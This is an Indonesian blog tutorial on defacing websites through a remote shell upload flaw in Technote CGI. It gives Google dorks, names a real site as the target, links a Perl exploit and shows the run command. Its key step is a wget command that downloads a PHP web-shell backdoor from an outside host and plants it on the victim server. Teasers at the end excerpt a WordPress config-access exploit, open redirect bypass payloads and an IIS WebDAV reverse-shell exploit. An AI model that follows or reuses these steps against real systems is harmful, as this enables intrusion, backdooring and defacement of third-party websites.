Langsung ke konten utama

Tutorial Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability


Hallo Pada kesempatan kali ini saya akan memberikan tutorial RCE Remote Code Exeecution.

Baiklah Langsung Saja

(Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability


Pertama Kita Dorking Dulu Webnya :
Google Dork 1 : 

inurl:/cgi-bin/technote/
inurl:".cgi?board=FREE_BOARD"
intext:"TECHNOTE-TOP"
kembangkan lagi bang biar banyak yang perawan





disini saya sudah mempunyai target :)
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD&number=20&view=2&howmanytext= 
kita ambil linknya sampe FREE_BOARD SAJA 
http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD

Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :)




https://pastebin.com/raw/jb4Zf0kn 

Ubah Ekstensi Menjadi pl karena ini codingan perl

gimana sih cara jalanin toolsnya ?
anda bisa menggunakan xampp  
karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3

Langkah Selanjutnya 
Buka Terminalnya  




kalian cukup ketik perintah / copy : 
perl namafile.pl target 



 
Enter Maka Hasilnya Akan Seperti Ini



itu berati vuln ? tidak semua yang vuln bisa ditanem shell/file lainnya disini kita akan tanem shell dengan menggunakan direct txt ke php gimana sih caranya ?
setelah ss di atas ketik perintah ls < untuk menampilkan folder folder / file yang ada di web tersebut 


maka hasilnya akan seperti diatas setelah itu anda tinggal masuk ke salah satu folder diatas disini saya akan masuk ke folder board  dengan ketik perintah cd board


maka hasilnya akan seperti ini  nah disini yang akan kita lakukan untuk menanem shell backdor anda bisa menggunakan shell backdor yang berada di web kami yang ber eks .txt
gimana sih ko txt bisa diubah ke php  ?
dengan ketik perintah diterminal wget http://showbizz98.com/tc.txt -O kontol.php < nah itu kontol.php adalah untuk mengubah shell txt ke php 


jika berhasil maka hasilnya akan seperti ss di atas  bang dimana sih letak shell nya :'( ? kan tadi sebelumnya kita sudah masuk folder kita ambil aja contoh link di atas /cgi_bin/board/namashell.php
 
 TerimaKasih
sumber:tatsumi-crew.net

Komentar

Postingan populer dari blog ini

Wordpress Premium Themes Shopsum Unauthenticated Configuration

# Exploit  Title : Wordpress Premium Themes Shopsum Unauthenticated Configuration Access Vulnerability # Author  : Mr.Buckethead # Date  : November 13th, 2014 # Category  : Web Applications # Vulnerability  : Unauthenticated Configuration Access # Tested  On : Windows 7 32-bit, Backbox # Dork  : inurl:/wp-content/themes/shopsum/hades_framework/ or use ur imagination #Exploit : http://localhost/path/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php # POC  : Save File As Python (.py) = import httplib, urllib # target  site site = "victim" #<--- no http:// or https:// # path  to ajax.php url = "t/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept...

Open Redirect Bypass Cheat Sheet

Open Redirect Bypass Cheat Sheet   Yoo Cherry     August 3, 2019     Cheat Sheet ,  Web Hacking     No Comments Open Redirect Bypass Cheat Sheet.  Open redirect  adalah celah yang memungkinkan attacker untuk mengarahkan pengunjung dari situs terpercaya ke situs malware atau phising tanpa autentifikasi dari admin situs. Bergantung pada arsitektur situs web yang rentan, pengalihan bisa terjadi setelah tindakan tertentu, seperti login, dan terkadang hal itu bisa terjadi seketika saat memuat sebuah halaman. Open Redirect Bypass Cheat Sheet http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://www.whitelisteddomain.tld@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://www.whitelisteddomain.tld@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 ...

Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow

/*******************************************************************/ /* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */ /* --------------------------------------------------------------- */ /* this is the exploit for ntdll.dll through WebDAV. */ /* run a netcat ex: nc -L -vv -p 666 */ /* wb server.com your_ip 666 0 */ /* the shellcode is a reverse remote shell */ /* you need to pad a bit.. the best way I think is launching */ /* the exploit with pad = 0 and after that, the server will be */ /* down for a couple of seconds, now retry with pad at 1 */ /* and so on..pad 2.. pad 3.. if you haven't the shell after */ /* something like pad at 10 I think you better to restart from */ /* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */ /* on all the others servers it was at 2,3,4, etc..sometimes */ /* you can have the force with you, and get the shell in 1 try */ /* sometimes you need to pad more than 10 times ;) */ /* the shellcode was coded by m...